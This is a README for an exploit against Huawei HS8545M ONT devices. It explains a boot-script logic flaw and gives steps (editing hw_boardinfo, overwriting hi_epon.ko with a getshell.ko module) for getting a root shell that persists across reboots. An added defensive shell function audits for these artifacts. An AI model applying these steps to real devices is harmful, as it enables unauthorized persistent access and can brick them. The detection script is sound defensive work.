Exploit-HS8545M-ONT

Exploit for the Huawei ONT device. Only r019 is supported; for r018 or r017 you need to compile the getshell.ko kernel module yourself.

Note

This may brick your ONT device. Use at your own risk!

Usage

Find an exploit to load a user-defined .ko module

The flaw is in /etc/rc.d/rc.start/1.sdk_init.sh: a kernel module (.ko) can be used to run the shell script /mnt/jffs2/hw/getshell.sh when the system reboots.

The logic flaw is in lines 200-206:

mkdir -p /mnt/jffs2/TranStar/
cp -rf /lib/modules/hisi_sdk/* /mnt/jffs2/TranStar/

In order to execute lines 261-262, change the following in /mnt/jffs2/hw_boardinfo:

obj.id = "0x00000001" ; obj.value = "4";

Upload the getshell.ko module (compiled by 0neday; only r019 is supported)

Copy getshell.ko to /mnt/jffs2/TranStar/hi_epon.ko.
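
A defender-side check for the artifacts described above, as an added example that is not part of this repository: it compares /mnt/jffs2/TranStar/ against the stock modules in /lib/modules/hisi_sdk/ and looks for the hw_boardinfo value and getshell.sh. The function name audit_ont, the ROOT prefix argument and the output labels are assumptions, as is the availability of cmp and grep where it runs; findings are indicators to review.

```shell
#!/bin/sh
# Added example: audit an ONT root filesystem (live, or an extracted copy)
# for the persistence artifacts this README describes.
# Usage: audit_ont [ROOT]   (ROOT is a path prefix; empty means the live /)
# Prints one finding per line; returns 1 if anything was found, else 0.

audit_ont() {
    root="${1:-}"
    stock="$root/lib/modules/hisi_sdk"
    shadow="$root/mnt/jffs2/TranStar"
    boardinfo="$root/mnt/jffs2/hw_boardinfo"
    hook="$root/mnt/jffs2/hw/getshell.sh"
    found=0

    # 1. Every module in the writable copy must be byte-identical to stock.
    if [ -d "$shadow" ]; then
        for f in "$shadow"/*; do
            [ -f "$f" ] || continue
            name=$(basename "$f")
            if [ ! -f "$stock/$name" ]; then
                echo "EXTRA $name"; found=1
            elif ! cmp -s "$f" "$stock/$name"; then
                echo "MODIFIED $name"; found=1
            fi
        done
    fi

    # 2. Board-info object 0x00000001 set to "4" (the value the README sets).
    #    An indicator only: compare against a known-good unit of the same model.
    if [ -f "$boardinfo" ] && grep -Eq \
        'obj\.id *= *"0x00000001" *; *obj\.value *= *"4"' "$boardinfo"; then
        echo "BOARDINFO 0x00000001=4"; found=1
    fi

    # 3. The script the README's module runs at boot.
    if [ -e "$hook" ]; then
        echo "HOOK mnt/jffs2/hw/getshell.sh"; found=1
    fi

    return "$found"
}
```

Run it as `audit_ont` on the device, or as `audit_ont /path/to/extracted/rootfs` against an offline copy of the filesystem.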

License

MIT